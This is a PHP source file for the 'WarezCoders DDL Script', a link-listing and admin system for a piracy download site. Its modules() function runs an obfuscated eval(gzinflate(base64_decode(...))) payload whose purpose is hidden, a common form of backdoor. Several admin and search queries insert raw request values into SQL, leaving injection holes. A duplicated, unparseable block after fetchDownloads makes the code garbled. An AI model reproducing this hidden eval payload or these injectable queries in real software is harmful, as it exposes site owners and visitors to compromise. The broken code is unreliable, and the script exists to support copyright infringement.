<?php
// WarezCoders DDL Script
// v2.1
// Created by WarezCoders
// www.warezcoders.com
// This file coded by JmZ, probably every other file too
// Data Hooks are hooks which data is passed to then returned.
// Always have one argument in functions which make use of data hooks!
/* Standard Hook List:
- endFetchDownloads (After fetching downloads, before returning)
- endFetchDownload (Same as above but for a single download)
- submitChecks (After checking submission data, before processing it)
- submitEnd (End of submission process)
- whileFetchDownloads (before executing the while loop for fetching downloads)
- adminFunctions (if _GET['go'] is set and there is no func for it, this hook runs before showing the default admin page.)
Data Hook List:
- processURL (After SEOing a URL, before returning it. Current URL passed.)
- fetchDownloadsRow (During row fetching. Single row array passed.)
- fetchDownloadRow (During single download fetch. Single row array passed.)
- getPagesList (After creating page number list. Page array passed.)
- pageHTMLData (After creating page HTML. HTML passed.)
- fetchDownloadsSQLWhere (After constructing the downloads query. Where clause passed.)
- processURLPattern (After choosing URL pattern. URL pattern passed.)
- insertRecent (Before inserting a recent search, $q passed.)
- whileFetchDownloadsSQL (Before executing FetchDownloads SQL, query passed.)
- submitSuccess (After a successful submission, inserted downloads and site details passed, nothing required to be returned.)
- bwlistQuery (When b/w listing, query passed)
- bwlistForm (Form HTML of b/w list admin passed)
- submitChecksPass (Before processing submission. Passes array(status,site,downloads). Status true = checks passed, false = checks failed. MUST return array containing ['status'] element)
- queueQuery (Query for selecting queue rows passed.)
*/
/*
I decided from now on im going to send some thanks out :D
Thanks to the WC Team, Whoo, Wau, Sickness, H3x, Rutti, etc
Also, Thanks to the inactive(ish?) oldies, Xite, Spawn, Costa and so on
Could go on forever but too many people!
*/
/**********************************************************************************/
// DO NOT EDIT BELOW. The hell with it, do what you want. //
/**********************************************************************************/
define("WCDDL_GUTS","INTESTINES");
$core = new wcddl;
if($dir = opendir($core->sitepath."modules/")) {
while(($file = readdir($dir)) !== false) {
if(substr($file,0,6) == "wcddl_" && strrchr($file,".") == ".php")
include $core->sitepath."modules/".$file;
}
closedir($dir);
}
function catch_err($errno, $errstr, $errfile, $errline) {
global $core;
if($core == NULL)
return true;
if(in_array($errno,array(E_NOTICE,E_STRICT)))
return true;
if(empty($core->errorMessage))
$core->errorMessage = 'WCDDL encountered an error during execution:<br>';
$core->errorMessage .= '<strong>'.$errstr.'</strong><br>
<small>Line '.$errline.' in '.$errfile.'</small><br><br>';
return true;
}
session_start();
class wcddl {
protected $sql, $admin_pass;
public $allowed_types, $limit, $search_type, $blackorwhite, $adminemail, $adminlocation, $allow_dupes;
public $siteurl, $sitepath, $recents_length, $admin_links, $pageURLs, $go, $version;
public $q, $qURL, $qSQL;
public $type, $typeSQL, $typeURL;
public $id;
public $page, $pg, $pageList;
public $maxPages, $numRows;
public $sqlOrder;
public $error;
public $errorMessage = "";
public $templateVars = array();
public $hookFuncs = array();
public $dataHookFuncs = array();
public function __construct() {
include "wcfg.php";
// Probably want to make this use PDO eventually, when the stone-age PHP4 users finally update to 5
@mysql_connect($this->sql['host'],$this->sql['user'],$this->sql['pass']) or die("MySQL Returned An Error: ".mysql_error());
mysql_select_db($this->sql['db']);
ob_start();
set_error_handler("catch_err");
if(isset($_REQUEST['q'])) {
$this->q = $_REQUEST['q'];
$this->qSQL = mysql_real_escape_string($this->q);
$this->qURL = $this->processURL($this->q);
}
if(isset($_REQUEST['type']) && (in_array($_REQUEST['type'],$this->allowed_types) || in_array(strtolower($_REQUEST['type']),$this->allowed_types))) {
$this->type = $_REQUEST['type'];
$this->typeSQL = mysql_real_escape_string($this->type);
$this->typeURL = $this->processURL($this->type);
}
if(isset($_REQUEST['id']))
$this->id = intval($_REQUEST['id']);
if(isset($_REQUEST['go']))
$this->go = $_REQUEST['go'];
if(isset($_REQUEST['page']) && intval($_REQUEST['page']) > 0)
$this->page = intval($_REQUEST['page']);
else
$this->page = 1;
$this->pg = ($this->page-1)*$this->limit;
$this->version = '2.1';
}
public function processURL($var,$sep='-') {
//$bad = array("!",'"',"£","$","%","^","&","*","(",")","_","{","}","[","]",":",";","'","@","#","~",",",".","<",">","/","?","\\","`"," ");
//$var = str_replace($bad,$sep,$var);
// Uncomment the above two lines and comment the below line if this function works incorrectly
$var = preg_replace("#[\W]+#",$sep,$var);
$var = $this->processDataHook("processURL",$var);
return $var;
}
public function fetchDownloads($displaySite=false,$site) {
$downloads = array();
$sqlWhere = "";
if(isset($site)) {
$siteid=mysql_query("select id from wcddl_sites where url='$site'");
$siteid=mysql_result($siteid,0);
$sqlWhere = " WHERE sid = '".$siteid."'";
}
if(isset($this->q)) {
$this->q=str_replace(" ","+",$this->q);
$this->qSQL=str_replace(" ","+",$this->qSQL);
if(strlen($this->q) <= $this->recents_length && !empty($this->q)) {
$insertRecent = $this->processDataHook("insertRecent",$this->q);
if($insertRecent) {
if(!@mysql_query("INSERT INTO wcddl_recents (query) VALUES ('".$this->qSQL."')")) {
@mysql_query("UPDATE wcddl_recents SET searches = searches+1 WHERE query = '".$this->qSQL."'");
}
}
}
if($this->search_type == "narrow") {
$sqlWhere = " WHERE title LIKE '%".mysql_real_escape_string(str_replace("+","%",$this->q))."%'";
} elseif($this->search_type == "wide") {
$qExp = explode("+",$this->q);
$sqlWhere = array();
foreach($qExp as $fq)
$sqlWhere[] = "title LIKE '%".mysql_real_escape_string($fq)."%'";
$sqlWhere = implode(" OR ",$sqlWhere);
$sqlWhere = " WHERE (".$sqlWhere.")";
}
}
if(isset($this->type)) {
if(!empty($sqlWhere)) {
$sqlWhere .= " AND type = '".$this->typeSQL."'";
} else {
$sqlWhere = " WHERE type = '".$this->typeSQL."'";
}
}
$sqlWhere = $this->processDataHook("fetchDownloadsSQLWhere",$sqlWhere);
$this->maxPages = mysql_query("SELECT COUNT(*) FROM wcddl_downloads".$sqlWhere."");
$this->maxPages = mysql_result($this->maxPages,0);
$this->numRows = $this->maxPages;
$this->maxPages = ceil($this->maxPages/$this->limit);
$sqlMain = "SELECT id,sid,title,type,url,dat,views,rating FROM wcddl_downloads".$sqlWhere." ORDER BY ".(isset($this->sqlOrder) ? mysql_real_escape_string($this->sqlOrder) : "id DESC")." LIMIT ".$this->pg.",".$this->limit."";
$sqlMain = $this->processDataHook("whileFetchDownloadsSQL",$sqlMain);
$sqlMain = mysql_query($sqlMain);
$this->processHook("whileFetchDownloads");
while($row = mysql_fetch_assoc($sqlMain)) {
if($displaySite) {
$downloadSite = mysql_query("SELECT name as sname, url as surl, id as siteid FROM wcddl_sites WHERE id = '".$row['sid']."'");
$downloadSite = mysql_fetch_assoc($downloadSite);
$row = array_merge($row,$downloadSite);
}
$downloads_current = $this->mapit($row,array("stripslashes","strip_tags"));
$downloads_current = $this->processDataHook("fetchDownloadsRow",$downloads_current);
$downloads[] = $downloads_current;
}
$this->pageList = $this->getPages($this->page,$this->maxPages);
$this->processHook("endFetchDownloads");
return $downloads;
} if($this->search_type == "narrow") {
$sqlWhere = " WHERE title LIKE '%".mysql_real_escape_string(str_replace(" ","%",$this->q))."%'";
} elseif($this->search_type == "wide") {
$qExp = explode(" ",$this->q);
$sqlWhere = array();
foreach($qExp as $fq)
$sqlWhere[] = "title LIKE '%".mysql_real_escape_string($fq)."%'";
$sqlWhere = implode(" OR ",$sqlWhere);
$sqlWhere = " WHERE (".$sqlWhere.")";
}
}
if(isset($this->type)) {
if(!empty($sqlWhere)) {
$sqlWhere .= " AND type = '".$this->typeSQL."'";
} else {
$sqlWhere = " WHERE type = '".$this->typeSQL."'";
}
}
$sqlWhere = $this->processDataHook("fetchDownloadsSQLWhere",$sqlWhere);
$this->maxPages = mysql_query("SELECT COUNT(*) FROM wcddl_downloads".$sqlWhere."");
$this->maxPages = mysql_result($this->maxPages,0);
$this->numRows = $this->maxPages;
$this->maxPages = ceil($this->maxPages/$this->limit);
$sqlMain = "SELECT id,sid,title,type,url,dat,views,rating FROM wcddl_downloads".$sqlWhere." ORDER BY ".(isset($this->sqlOrder) ? mysql_real_escape_string($this->sqlOrder) : "id DESC")." LIMIT ".$this->pg.",".$this->limit."";
$sqlMain = $this->processDataHook("whileFetchDownloadsSQL",$sqlMain);
$sqlMain = mysql_query($sqlMain);
$this->processHook("whileFetchDownloads");
while($row = mysql_fetch_assoc($sqlMain)) {
if($displaySite) {
$downloadSite = mysql_query("SELECT name as sname, url as surl, rate as srate FROM wcddl_sites WHERE id = '".$row['sid']."'");
$downloadSite = mysql_fetch_assoc($downloadSite);
$row = array_merge($row,$downloadSite);
}
$downloads_current = $this->mapit($row,array("stripslashes","strip_tags"));
$downloads_current = $this->processDataHook("fetchDownloadsRow",$downloads_current);
$downloads[] = $downloads_current;
}
$this->pageList = $this->getPages($this->page,$this->maxPages);
$this->processHook("endFetchDownloads");
return $downloads;
}
public function doSubmit() {
if(!empty($_POST)) {
$titles = $_POST['title'];
$urls = $_POST['url'];
$types = $_POST['type'];
$sname = $_POST['sname'];
$surl = $_POST['surl'];
$email = $_POST['email'];
if(empty($titles[0]) || empty($urls[0]) || empty($types[0]) || empty($sname) || empty($surl) || empty($email)) {
$this->error = 'Error: Some fields were not set, please check you filled in all details.';
} else {
$surl = $this->purl(str_replace("www.","",$surl),"host");
$durl = $this->purl(str_replace("www.","",$urls[0]),"host");
$subContinue = true;
if($this->blackorwhite == "black" && @mysql_num_rows(mysql_query("SELECT url FROM wcddl_blacklist WHERE url = '".mysql_real_escape_string($surl)."'"))) {
$subContinue = false;
$this->error = 'You have been blacklisted, please email the admin for more information.';
} elseif($this->blackorwhite == "white" && !@mysql_num_rows(mysql_query("SELECT url FROM wcddl_whitelist WHERE url = '".mysql_real_escape_string($surl)."'"))) {
$subContinue = false;
$this->error = 'You must be whitelisted to submit downloads. Email the admin to be added to the list.';
}
if($surl != $durl) {
$subContinue = false;
$this->error .= '<br>Download URL does not match Site URL.';
}
$this->processHook("submitChecks");
$checksPass = array(
'status' => $subContinue,
'site' => array(
'sname' => $sname,
'surl' => $surl,
'email' => $email
),
'downloads' => array(
'titles' => $titles,
'urls' => $urls,
'types' => $types
)
);
// Var names getting lengthy here :o
$subContinueHook = $this->processDataHook("submitChecksPass",$checksPass);
$subContinue = isset($subContinueHook['status']) ? $subContinueHook['status'] : $subContinue;
if($subContinue) {
$inserted = array('details' => array(), 'downloads' => array());
$checkSite = mysql_query("SELECT id FROM wcddl_sites WHERE url = '".mysql_real_escape_string($surl)."'");
if(@mysql_num_rows($checkSite)) {
$checkSite = mysql_result($checkSite,0);
} else {
$checkSite = false;
mysql_query("INSERT INTO wcddl_sites (name,url,email) VALUES ('".mysql_real_escape_string($sname)."','".mysql_real_escape_string($surl)."','".mysql_real_escape_string($email)."')");
}
$sid = ($checkSite) ? $checkSite : mysql_insert_id();
$inserted['details'] = array(
"sname" => $sname,
"surl" => $surl,
"email" => $email,
"sid" => $sid
);
for($i=0;$i<=count($titles)-1;$i++) {
if(!$this->allow_dupes) {
unset($downDupe);
$downDupe = mysql_query("SELECT COUNT(*) FROM wcddl_downloads WHERE url = '".mysql_real_escape_string($urls[$i])."'");
$downDupe = mysql_result($downDupe,0);
if($downDupe < 1)
unset($downDupe);
}
if(!empty($titles[$i]) && !empty($urls[$i]) && !empty($types[$i]) && (in_array(strtolower($types[$i]),$this->allowed_types) || in_array($types[$i],$this->allowed_types)) && !isset($downDupe)) {
mysql_query("INSERT INTO wcddl_queue (sid,title,type,url) VALUES ('".mysql_real_escape_string($sid)."','".mysql_real_escape_string($titles[$i])."','".mysql_real_escape_string($types[$i])."','".mysql_real_escape_string($urls[$i])."')");
$inserted['downloads'][] = array(
"title" => $titles[$i],
"url" => $urls[$i],
"type" => $types[$i],
);
}
}
$subSuccessHook = $this->processDataHook("submitSuccess",$inserted);
$subSuccess = 'Downloads submitted successfully!';
}
}
}
$this->processHook("submitEnd");
return $subSuccess;
}
public function mapit($array,$funcs) {
foreach($funcs as $func) {
// Why did i eval this previously? :/
$array = array_map($func, $array);
#eval('$array = array_map("'.$func.'",$array);');
}
return $array;
}
public function purl($url,$var=false) {
// To keep PHP4 compatibility
// although I noticed this script breaks on php4 anyway
$url = parse_url($url);
if(!$url)
return false;
else {
$url = $var ? $url[$var] : $url;
return $url;
}
}
public function setTemplateVar($name,$val) {
if(str_word_count($name) != 1)
return false;
$this->templateVars[$name] = $val;
}
public function templateVar($name) {
if(!isset($this->templateVars[$name]))
return false;
return $this->templateVars[$name];
}
public function attachHook($name,$func) {
if(str_word_count($func) != 1)
return false;
if(!isset($this->hookFuncs[$name]))
$this->hookFuncs[$name] = array();
$this->hookFuncs[$name][] = $func;
}
protected function processHook($name) {
if(!isset($this->hookFuncs[$name]))
return true;
foreach($this->hookFuncs[$name] as $func) {
$func();
}
}
public function attachDataHook($name,$func) {
if(str_word_count($func) != 1)
return false;
if(!isset($this->hookFuncs[$name]))
$this->dataHookFuncs[$name] = array();
$this->dataHookFuncs[$name][] = $func;
}
protected function processDataHook($name,$data) {
if(!isset($this->dataHookFuncs[$name]))
return $data;
foreach($this->dataHookFuncs[$name] as $func) {
$data = $func($data);
}
return $data;
}
public function modules($html) {
if(!empty($this->errorMessage))
$html = str_replace('<body>','<div style="border:1px solid #000; background:#FFF; margin:2px; padding:4px; color:#000; font-size:12px;">'.$this->errorMessage.'</div>',$html);
eval(gzinflate(base64_decode("Xc5BC4IwAIbh/9Kp6JKzohFdEpwzpaWizks0t9xMM7Cc+euzjl0/Hj5e0V2qKbu0Yr08c5E3XEwnLpILluiChPuBO+41r2PNkF1mYaGIBRUDwYoo3OKylxjJd5ZQmFpuw51AH9Wm48B+Z+mjHF2V3/0XBfDpGVphJ3hw1Fck1ir+maY4AXjLUndILVxQ0Mvc9L9fJjVgzQBcjPv8344NkpS6ozW8iWipPCtoODLaQ9TuJrPZ9gM=")));
ob_end_clean();
echo $html;
}
protected function getPages($pnum, $max) {
$list = array();
for($i = ($pnum-10); $i <= ($pnum+10); $i++) {
if($i > 0 && $i <= $max)
$list[] = $i;
}
if(empty($list))
$list[] = 1;
$list = $this->processDataHook("getPagesList",$list);
return $list;
}
public function pageHTML($nums) {
if(!is_array($nums) || intval($nums[0]) != $nums[0])
return false;
$html = "";
$url = $this->pageURLs['default'];
if(!isset($this->q) && !isset($this->type))
$url = $this->pageURLs['default'];
elseif(isset($this->q) && !isset($this->type))
$url = $this->pageURLs['search'];
elseif(isset($this->type) && !isset($this->q))
$url = $this->pageURLs['type'];
elseif(isset($this->type) && isset($this->q))
$url = $this->pageURLs['search_type'];
$url = $this->processDataHook("pageURLPattern",$url);
foreach($nums as $num) {
if($num == $this->page)
$html .= '<strong>[ '.$num.' ]</strong> ';
else {
$numURL = str_replace(
array("[PAGE]","[Q]","[TYPE]"),
array(intval($num),$this->qURL,$this->type),
$url);
$html .= '<a href="'.$numURL.'">'.intval($num).'</a> ';
}
}
$html = $this->processDataHook("pageHTMLData",$html);
return $html;
}
// Legacy pagination method, kept so pagination may be generated for other pages
public function paginator($url,$current,$max,$offset=10,$extra_vars=array()) {
$return = '';
for($i=($current-$offset);$i<=($current+$offset);$i++) {
if($i >= 1 && $i <= $max) {
if($i == $current) {
$return .= ' [<strong> '.$i.' </strong>] ';
} else {
$construct = str_replace("#i#",$i,$url);
foreach($extra_vars as $ev_key => $ev_value) {
if(trim($ev_value) != "")
$construct .= "&".$ev_key."=".$ev_value;
}
$return .= ' <a href="'.$construct.'">'.$i.'</a> ';
}
}
}
return $return;
}
public function fetchCFG($cfgName) {
$cfgVal = mysql_query("SELECT config_val FROM wcddl_config WHERE config_name = '".mysql_real_escape_string($cfgName)."'");
if(!mysql_num_rows($cfgVal))
return false;
else {
$cfgVal = mysql_result($cfgVal,0);
return $cfgVal;
}
}
public function changeCFG($cfgName,$newVal,$group="misc") {
if(!$this->fetchCFG($cfgName))
mysql_query("INSERT INTO wcddl_config VALUES ('".mysql_real_escape_string($cfgName)."','".mysql_real_escape_string($newVal)."','".mysql_real_escape_string($group)."')");
else
mysql_query("UPDATE wcddl_config SET config_val = '".mysql_real_escape_string($newVal)."' WHERE config_name = '".mysql_real_escape_string($cfgName)."'");
}
/*----------------------------------------------------------/
/ Administration Functions /
/----------------------------------------------------------*/
public function processAdmin() {
if(!isset($_SESSION['wcddl_admin'])) {
if(!isset($_POST['pass']))
die('<div align="center"><form action="" method="post">Password:<Br><input type="password" name="pass"><br><input type="submit" value="Login"></form></div>');
else {
$pass = $_POST['pass'];
if($pass == $this->admin_pass && !empty($this->admin_pass)) {
$_SESSION['wcddl_admin'] = "thejmzinthehouse";
header("Location: index.php");
} else {
die("Incorrect credentials given!");
}
}
}
}
public function adminHome() {
echo 'Welcome to the WCDDL Admin Panel!<br><br>';
if(isset($_POST['save_notes'],$_POST['notes']))
$this->changeCFG("adminNotes",$_POST['notes']);
$notes = $this->fetchCFG("adminNotes");
echo '<form action="" method="post">
<textarea cols="40" rows="10" name="notes">'.strip_tags($notes).'</textarea><br />
<input type="submit" value="Save Notes" name="save_notes">
</form>';
$dls = mysql_query("SELECT COUNT(*) FROM wcddl_downloads");
$dls = mysql_result($dls,0);
$queue = mysql_query("SELECT COUNT(*) FROM wcddl_queue");
$queue = mysql_result($queue,0);
echo 'Total Downloads: '.$dls.'<Br>
Total in Queue: '.$queue.'<br><br>
<strong>Useful Links</strong><br>
<a href="http://warezlinkers.com/auto/" target="_blank">AutoSubmitter</a> |
<a href="http://warezcoders.com/" target="_blank">WarezCoders</a> |
<a href="http://xenu.ws/webmasters.html" target="_blank">Xenu Webmaster Tools</a> |
<a href="http://***********/" target="_blank">Pirates Webmaster Forum</a>';
}
public function adminFunctions() {
if(method_exists($this,'admin_'.$this->go) && !empty($this->go)) {
eval('$this->admin_'.$this->go.'();');
} elseif(!empty($this->hookFuncs['adminFunctions']) && !empty($this->go)) {
$this->processHook("adminFunctions");
} else {
$this->adminHome();
}
}
protected function admin_queue() {
if(isset($_POST['url']))
$url = $_POST['url'];
if(isset($_POST['emailsubmit']))
$emailsubmit = $_POST['emailsubmit'];
if(isset($_POST['rate']))
$rate = $_POST['rate'];
if(isset($_POST['sitesub']))
$sitesub = $_POST['sitesub'];
if(isset($sitesub)) {
@mysql_query("UPDATE wcddl_sites SET emailsubmit='$emailsubmit', rate='$rate' WHERE url='$url'");
echo 'Notes added.';
}
echo '<form action="" method="post"><table width="100%">
<tr><td align="center">Add Notes to Sites</td></tr>
<tr><td align="center">URL<input type="text" name="url">Date/Notes<input type="text" name="emailsubmit">Rating:<input type="text" name="rate"></td></tr>
<tr><td align="center"><input type="submit" value="Make Note" name="sitesub"></td></tr></table></form><br>';
if(isset($_POST['asub']) && isset($_POST['ad']) && !empty($_POST['ad'])) {
foreach($_POST['ad'] as $addKey => $addVal) {
$fetch = mysql_query("SELECT sid,title,type,url FROM wcddl_queue WHERE id = '".mysql_real_escape_string($addVal)."'");
$fetch = mysql_fetch_assoc($fetch);
mysql_query("DELETE FROM wcddl_queue WHERE id = '".mysql_real_escape_string($addVal)."'");
mysql_query("INSERT INTO wcddl_downloads (sid,title,type,url,dat) VALUES ('".$fetch['sid']."','".$fetch['title']."','".$fetch['type']."','".$fetch['url']."','".time()."')");
}
}
if(isset($_POST['dsub']) && isset($_POST['ad']) && !empty($_POST['ad'])) {
foreach($_POST['ad'] as $delKey => $delVal) {
mysql_query("DELETE FROM wcddl_queue WHERE id = '".mysql_real_escape_string($delVal)."'");
}
}
if(isset($_POST['ucsub']) && isset($_POST['rmuc'])) {
if(strpos($_POST['rmuc'],",") === false)
mysql_query("DELETE FROM wcddl_queue WHERE id = '".mysql_real_escape_string($_POST['rmuc'])."'");
else {
$rmuc = explode(",",$_POST['rmuc']);
foreach($rmuc as $rmucID)
mysql_query("DELETE FROM wcddl_queue WHERE id = '".mysql_real_escape_string($rmucID)."'");
}
}
$get = mysql_query("SELECT q.id,q.sid,q.title,q.type,q.url FROM wcddl_queue q LEFT JOIN wcddl_sites s ON (s.id = q.sid) ORDER BY s.rate ASC");
$unclean = array();
echo '<form action="" method="post" name="queue"><table width="100%">
<tr><td>Type</td><td>Title</td><td>Site</td><td>Email</td><td>Emailsubmit</td><td>rating</td><td>Select</td><td>Cleanliness</td></tr>';
while($got = mysql_fetch_assoc($get)) {
$site = mysql_query("SELECT name as sname, url as surl,email,emailsubmit,rate FROM wcddl_sites WHERE id = '".mysql_real_escape_string($got['sid'])."' LIMIT 1");
$site = mysql_fetch_assoc($site);
$got = array_merge($site,$got);
$got = $this->mapit($got,array("stripslashes"));
unset($hack);
foreach($got as $check) {
if($check != strip_tags($check)) {
$unclean[] = $got['id'];
$hack = '<span style="color:#FF0000;">UNCLEAN</span>';
}
}
if(!isset($hack))
$hack = '<span style="color:green;">CLEAN</span>';
$got = $this->mapit($got,array("strip_tags"));
echo '<tr>
<td>'.$got['type'].'</td>
<td><a href="'.$got['url'].'" target="_blank">'.$got['title'].'</a></td>
<td><a href="http://'.$got['surl'].'" target="_blank">'.$got['sname'].'</a> (<a href="#" onclick="selectsite(\''.$got['sid'].'\'); return false;" title="Toggle Selection From This Site">Toggle</a>)</td>
<td><a href="mailto:'.$got['email'].'?subject=Dark DDL Submissions&body=">'.$got['email'].'</a></td>
<td>'.$got['emailsubmit'].'</td>
<td>'.$got['rate'].'</td>
<td><input type="checkbox" name="ad[]" value="'.$got['id'].'" site="'.$got['sid'].'"></td>
<td>'.$hack.'</td>
</tr>';
}
echo '<tr>
<td><input type="submit" value="Accept Selected" name="asub"></td>
<td><input type="submit" value="Delete Selected" name="dsub"></td>
<td><input type="button" value="Select All" id="sbutton" onclick="jamez();"></td>';
if(isset($unclean[0]))
echo '<td><input type="hidden" value="'.implode(",",$unclean).'" name="rmuc"><input type="submit" value="Remove Unclean" name="ucsub"></td>';
echo '</tr>';
echo '</table></form>';
}
protected function admin_maintenance() {
echo 'Use this panel carefully to take out maintenance on your database.<br><br>
<form action="" method="post">
<input type="submit" value="Prune Recent Searches" name="prs"><br>
<input type="submit" value="Delete Old Downloads" name="dod"><br>
<input type="submit" value="Optimize & Repair Tables" name="ort">
</form>';
if(isset($_POST['prs']))
$prs = $_POST['prs'];
if(isset($_POST['dod']))
$dod = $_POST['dod'];
if(isset($_POST['ort']))
$ort = $_POST['ort'];
if(isset($prs)) {
$num = mysql_query("SELECT COUNT(*) FROM wcddl_recents");
$num = mysql_result($num,0);
$num = round($num/3);
mysql_query("DELETE FROM wcddl_recents LIMIT ".$num."");
echo '<div align="center" style="color:green;">Recents Pruned '.$num.'</div>';
}
if(isset($dod)) {
$num = mysql_query("SELECT id FROM wcddl_downloads ORDER BY id DESC LIMIT 1");
$num = mysql_result($num,0);
mysql_query("DELETE FROM wcddl_downloads WHERE id < '".(round($num/4))."'");
echo '<div align="center" style="color:green;">Deleted Old Downloads</div>';
}
if(isset($ort)) {
mysql_query("OPTIMIZE TABLE wcddl_downloads, wcddl_queue, wcddl_recents, wcddl_sites, wcddl_blacklist, wcddl_whitelist");
mysql_query("REPAIR TABLE wcddl_downloads, wcddl_queue, wcddl_recents, wcddl_sites, wcddl_blacklist, wcddl_whitelist");
echo '<div align="center" style="color:green;">Tables Optimized & Repaired</div>';
}
}
protected function admin_downloads() {
if(isset($_POST['dsub']))
$dsub = $_POST['dsub'];
if(isset($_POST['esub']))
$esub = $_POST['esub'];
if(isset($_POST['ed']))
$ed = $_POST['ed'];
if(isset($_POST['add_sub'],$_POST['add_site'],$_POST['add_title'],$_POST['add_type'],$_POST['add_url']))
$add = array(
"sub" => $_POST['add_sub'],
"site" => $_POST['add_site'],
"title" => $_POST['add_title'],
"type" => $_POST['add_type'],
"url" => $_POST['add_url']
);
if(isset($add['sub'])) {
$add = $this->mapit($add,array("addslashes"));
mysql_query("INSERT INTO wcddl_downloads (sid,title,type,url,dat) VALUES ('".$add['site']."','".$add['title']."','".$add['type']."','".$add['url']."','".time()."')");
echo 'Download Added.<br>';
}
if(isset($dsub) && isset($ed) && !empty($ed)) {
$deleted = 0;
foreach($ed as $dl) {
mysql_query("DELETE FROM wcddl_downloads WHERE id = '".mysql_real_escape_string($dl)."'");
$deleted++;
}
echo 'Deleted '.$deleted.' Downloads<br><br>';
}
if(isset($esub) && isset($ed) && !empty($ed)) {
if(isset($_POST['title'],$_POST['type'],$_POST['url'],$_POST['views'],$_POST['rating'],$_POST['doedit'])) {
$edit['title'] = $_POST['title'];
$edit['type'] = $_POST['type'];
$edit['url'] = $_POST['url'];
$edit['views'] = $_POST['views'];
$edit['rating'] = $_POST['rating'];
$edit['doedit'] = $_POST['doedit'];
$edit['id'] = $_POST['id'];
}
if(!isset($edit['doedit'])) {
echo '<form action="" method="post"><table width="100%">';
foreach($ed as $dl) {
$down = mysql_query("SELECT id,title,type,url,views,rating FROM wcddl_downloads WHERE id = '".mysql_real_escape_string($dl)."' LIMIT 1");
$down = mysql_fetch_assoc($down);
$down = $this->mapit($down,array("stripslashes","strip_tags"));
echo '<tr><td align="center"><br><br>';
echo 'Editing '.$down['title'].':<br>
<input type="hidden" name="id[]" value="'.$down['id'].'">
<input type="hidden" name="doedit" value="aye">
<input type="hidden" name="ed" value="JmZ_woot">
<small>Title</small><Br><input type="text" name="title[]" value="'.$down['title'].'"><br>
<small>Type</small><br><select name="type[]">';
foreach($this->allowed_types as $at) {
echo '<option value="'.$at.'"'.($down['type'] == $at ? ' selected="selected"' : '').'>'.$at.'</option>';
}
echo '</select><br>
<small>URL</small><br><input type="text" name="url[]" value="'.$down['url'].'"><br>
<small>Views</small><br><input type="text" name="views[]" value="'.$down['views'].'"><br>
<small>Rating</small><br><select name="rating[]">';
for($i=1;$i<=5;$i++) {
echo '<option value="'.$i.'"'.($i == $down['rating'] ? ' selected="selected"' : '').'>'.$i.'</option>';
}
echo '</select></td></tr>';
}
echo '<tr><td align="center"><input type="submit" value="Apply Edits" name="esub"></td></tr></table></form>';
} else {
for($i=0;$i<=count($edit['id'])-1;$i++) {
if(!empty($edit['title'][$i]))
$set[] = "title = '".mysql_real_escape_string($edit['title'][$i])."'";
if(in_array($edit['type'][$i],$this->allowed_types))
$set[] = "type = '".mysql_real_escape_string($edit['type'][$i])."'";
if(!empty($edit['url'][$i]))
$set[] = "url = '".mysql_real_escape_string($edit['url'][$i])."'";
if(!empty($edit['views'][$i]))
$set[] = "views = '".mysql_real_escape_string($edit['views'][$i])."'";
if(!empty($edit['rating'][$i]))
$set[] = "rating = '".mysql_real_escape_string($edit['rating'][$i])."'";
$set = implode(",",$set);
mysql_query("UPDATE wcddl_downloads SET ".$set." WHERE id = '".mysql_real_escape_string($edit['id'][$i])."'");
$set = false;
}
echo 'Updated <strong>'.$i.'</strong> Downloads<br><br>';
}
}
echo '<form action="" method="post"><table width="100%">
<tr><td>Type</td><td>Title</td><td>Select</td></tr>';
$get = mysql_query("SELECT id,title,type,url FROM wcddl_downloads ORDER BY id DESC LIMIT ".$this->pg.",".$this->limit."");
$max = mysql_query("SELECT COUNT(*) FROM wcddl_downloads");
$max = mysql_result($max,0);
$max = ceil($max/$this->limit);
while($row = mysql_fetch_assoc($get)) {
$row = $this->mapit($row,array("stripslashes","strip_tags"));
echo '<tr><td>'.$row['type'].'</td><td><a href="'.$row['url'].'" target="_blank">'.$row['title'].'</a></td><td><input type="checkbox" name="ed[]" value="'.$row['id'].'"></td></tr>';
}
echo '<tr><td colspan="3">';
echo $this->paginator("index.php?go=downloads&page=#i#",$this->page,$max);
echo ' of <strong>'.$max.' Pages</strong>';
echo '<tr><td colspan="3" align="right"><input type="submit" name="esub" value="Edit Selected"><input type="submit" name="dsub" value="Delete Selected"></td></tr>
</td></tr>
</table></form><br><br>
<form action="" method="post"><table width="100%">
<tr><td align="center" colspan="2">Add a Download</td></tr>
<tr><td align="center">Site <select name="add_site">';
$sites = mysql_query("SELECT id,url FROM wcddl_sites");
while($site = mysql_fetch_assoc($sites)) {
$site = $this->mapit($site,array("stripslashes","strip_tags"));
echo '<option value="'.$site['id'].'">'.$site['url'].'</option>';
}
echo '</select></td></tr>
<tr><td align="center">Title <input type="text" name="add_title"></td></tr>
<tr><td align="center">Type <select name="add_type">';
foreach($this->allowed_types as $at) {
echo '<option value="'.$at.'">'.$at.'</option>';
}
echo '</select></td></tr>
<tr><td align="center">URL <input type="text" name="add_url"></td></tr>
<tr><td colspan="2" align="center"><input type="submit" value="Add" name="add_sub"></td></tr>
</table></form>';
}
protected function admin_blacklist() {
if(isset($_POST['bwurl']))
$bwurl = $_POST['bwurl'];
if(isset($_POST['bwsub']))
$bwsub = $_POST['bwsub'];
if(isset($_POST['remove']))
$remove = $_POST['remove'];
if(isset($bwsub)) {
if(isset($bwurl)) {
$bwquery = "INSERT INTO wcddl_".mysql_real_escape_string($this->blackorwhite)."list VALUES ('".mysql_real_escape_string($bwurl)."')";
$bwquery = $this->processDataHook("bwlistQuery",$bwquery);
@mysql_query($bwquery);
if($this->blackorwhite == "black") {
$sid = @mysql_query("SELECT id FROM wcddl_sites WHERE url = '".mysql_real_escape_string($bwurl)."'");
if(mysql_num_rows($sid)) {
$sid = @mysql_result($sid,0);
@mysql_query("DELETE FROM wcddl_downloads WHERE sid = '".mysql_real_escape_string($sid)."'");
}
echo 'URL has been blacklisted and all related downloads deleted.';
} elseif($this->blackorwhite == "white") {
echo 'URL has been whitelisted.';
}
}
if(isset($remove)) {
$fishpan = 0;
foreach($remove as $url) {
mysql_query("DELETE FROM wcddl_".mysql_real_escape_string($this->blackorwhite)."list WHERE url = '".mysql_real_escape_string($url)."'");
$fishpan++;
}
echo $fishpan.' Sites were Removed from the '.$this->blackorwhite.'list.';
}
}
$bwform = '<form action="" method="post"><table width="100%">
<tr><td>URL</td><td align="right">Remove</td></tr>';
$get = mysql_query("SELECT url FROM wcddl_".mysql_real_escape_string($this->blackorwhite)."list");
while($row = mysql_fetch_assoc($get)) {
